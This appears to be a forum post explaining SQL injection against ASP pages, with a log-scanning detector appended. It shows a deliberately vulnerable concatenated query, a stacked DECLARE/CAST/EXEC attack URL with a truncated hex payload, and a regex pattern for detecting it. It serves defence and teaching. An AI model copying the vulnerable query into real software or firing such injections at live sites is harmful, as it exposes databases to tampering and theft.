Denying POST will not completely help. SQL injection can also be done using GET requests.
The complete fix is to convert all the query-construction scripts to stored procs instead of building the queries inside ASP pages. Stored procs need only execute permissions to run. Deny write access to all tables. This will be costly sometimes, as many web applications are not designed this way.
My sites have also had SQL injections since April 08. I've investigated it. Here is how it works.
For example...
You have an ASP file customer_lookup.asp with the following script in it:
sql = "SELECT * FROM customer_table WHERE cust_email='" & Request.QueryString("email") & "'"
Here you are constructing the SQL statement by appending the value of the URL query-string parameter EMAIL.
The page will typically be called as http://www.mydomain.com/customer_lookup.asp?email=[email protected]
Now an attacker can call the same page this way:
http://www.mydomain.com/[email protected];DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415....) AS VARCHAR(4000));EXEC(@S);
Now the actual script inside Customer_lookup.asp will be:
SELECT * FROM customer_table WHERE [email protected];DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415....) AS VARCHAR(4000));EXEC(@S);
As you can see, the semicolon (";") is a separator for SQL commands, so the page will execute the injected SQL commands.
If the DB user account you use with IIS has full write rights on the database, then the script can drop tables, query tables, and delete/modify other database objects.
Here are some of the injections into my tables. As you can see, all are from the ".cn" domain (Chinese).
Another way to solve this problem is for JODOHOST to block all TCP requests coming from China at the firewall.
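As an added example (not code from the post or from JODOHOST), here is a Python check a defender could run over IIS logs to spot the stacked DECLARE/CAST/EXEC pattern described above and decode the hex literal to see what was actually injected. It assumes the W3C field order named in the docstring and runs over a constructed sample log.

```python
import re
from urllib.parse import unquote_plus

# Shape of the stacked query quoted above: a ";" closes the application's own
# statement, then DECLARE / SET @S=CAST(0x... AS VARCHAR(n)) / EXEC(@S) follow.
STACKED_SQL = re.compile(
    r";\s*DECLARE\s+(@\w+)\s+VARCHAR\(\d+\)\s*;\s*SET\s+\1\s*=\s*CAST\(0x([0-9A-Fa-f]+)\)?"
    r"\s+AS\s+VARCHAR\(\d+\)\)\s*;\s*EXEC\(\1\)",
    re.IGNORECASE,
)

def decode_hex_literal(hex_digits):
    """Recover the SQL text hidden in a CAST(0x... AS VARCHAR) literal. An odd digit
    count means the log field was cut off mid-payload: decode the even prefix, flag it."""
    truncated = len(hex_digits) % 2 == 1
    usable = hex_digits[: len(hex_digits) - (1 if truncated else 0)]
    return bytes.fromhex(usable).decode("latin-1"), truncated  # VARCHAR = single-byte chars

def find_stacked_injection(query_string):
    """Decode a URL-encoded cs-uri-query; return payload details or None."""
    m = STACKED_SQL.search(unquote_plus(query_string))
    if not m:
        return None
    text, truncated = decode_hex_literal(m.group(2))
    return {"variable": m.group(1), "payload": text, "truncated": truncated}

def scan_iis_log(lines):
    """Assumed W3C field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        info = find_stacked_injection(fields[5])
        if info:
            hits.append({"client": fields[2], "method": fields[3], "page": fields[4], **info})
    return hits

# Constructed sample log, not real traffic; the hex literal carries a harmless constructed statement.
CONSTRUCTED_SQL = "DECLARE @T VARCHAR(255);SELECT 'constructed sample'"
CONSTRUCTED_HEX = "0x" + CONSTRUCTED_SQL.encode("latin-1").hex().upper()
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2008-04-20 10:15:01 198.51.100.20 GET /customer_lookup.asp email=me%40example.com 200",
    "2008-04-20 10:15:07 203.0.113.7 GET /customer_lookup.asp "
    "email=me%40example.com%3BDECLARE+%40S+VARCHAR%284000%29%3BSET+%40S%3DCAST%28"
    + CONSTRUCTED_HEX + "+AS+VARCHAR%284000%29%29%3BEXEC%28%40S%29%3B 200",
]
```

Because the match is on the decoded query string, it catches the GET form the post describes; the same functions can be pointed at a decoded POST body if that is logged.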